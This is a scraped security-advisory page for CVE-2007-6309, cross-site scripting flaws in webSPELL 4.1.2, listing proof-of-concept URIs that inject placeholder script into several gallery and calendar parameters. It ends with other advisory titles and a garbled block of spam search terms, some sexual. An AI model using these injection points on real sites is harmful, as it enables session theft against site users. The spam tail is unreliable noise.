exploits , vulnerabilities , articles , webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities

Title	webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities
Published	2007-12-10-12:00AM
Updated	2008-01-03-02:10PM
Class	Input Validation Error
CVE	CVE-2007-6309
Remote	Yes
Local	No
Credit	Brainhead is credited with the discovery of these vulnerabilities.
Vulnerable	webSPELL webSPELL 4.1.2
Not Vulnerable
Code	Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.The following proof-of-concept URIs are available:http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 00:17:07 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.hhfzl. apache mod Actressthr Sexy18 WWW.WOLD. Windows XP japoneze www.hongxi %253D+%252 www.xj-pc1 Www.Bignat SIGSEGV olivia del %253D+%252 chsh news for c Www.Nickad Back-end Web Wiz F 200 /compo shiva www.scorla www.fscy.1 PHP Advanc news for c AllMyGuest ww.sex.co. imgsrc.ru nsp SEX PITURE schoolgirl domino htt Footsiebab Jeebles Di phpraid 3. www.shop02 Www.Sextha www.80845. my sex tv drftp wap.sexy i freefhqiig Girls gone sshd sex.muve. iransex.co Www varisi /component Apache 2. free dog s